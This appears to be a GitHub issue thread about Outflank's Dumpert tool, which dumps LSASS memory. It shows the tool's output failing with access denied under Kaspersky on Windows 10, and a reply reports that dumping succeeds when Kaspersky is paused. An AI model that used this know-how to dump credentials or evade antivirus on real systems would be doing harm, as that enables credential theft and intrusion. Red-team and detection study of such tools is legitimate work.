Unable to dump LSASS memory on Windows 10 with Kasperky Total Security

[transilience]

C:\Windows\Temp>.\Outflank-Dumpert.exe
 ________          __    _____.__                 __
 \_____  \  __ ___/  |__/ ____\  | _____    ____ |  | __
  /   |   \|  |  \   __\   __\|  | \__  \  /    \|  |/ /
 /    |    \  |  /|  |  |  |  |  |__/ __ \|   |  \    <
 \_______  /____/ |__|  |__|  |____(____  /___|  /__|_ \
         \/                             \/     \/     \/
                                  Dumpert
                               By Cneeliz @Outflank 2019

[1] Checking OS version details:
        [+] Operating System is Windows 10 or Server 2016, build number 18363
        [+] Mapping version specific System calls.
[2] Checking Process details:
        [+] Process ID of lsass.exe is: 584
        [+] NtReadVirtualMemory function pointer at: 0x00007FFF92C3C840
        [+] NtReadVirtualMemory System call nr is: 0x3f
        [+] Unhooking NtReadVirtualMemory.
[3] Create memorydump file:
        [+] Open a process handle.
        [+] Dump lsass.exe memory to: \??\C:\Windows\Temp\dumpert.dmp
        [!] Failed to create minidump, error code: 80070005



C:\Windows\Temp>systeminfo

Host Name:                 DESKTOP-1
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.18363 N/A Build 18363
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          localhost

It would be great if error code 80070005 could be explained please so that the same can be attempted

[kirubaKaranT]

i'm also facing same issue
@transilience did you find any solution for it?

[janedoe-lab]

80070005 error code is ACCESS DENIED. Not sure if it is about access to dumpert.dll or to lsass.exe process (likely the later). Good news - when Kaspersky is in Pause mode, lsass.exe can be dumped (unlike using standard tools - Kaspersky's drivers block dumping lsass even when it is Paused)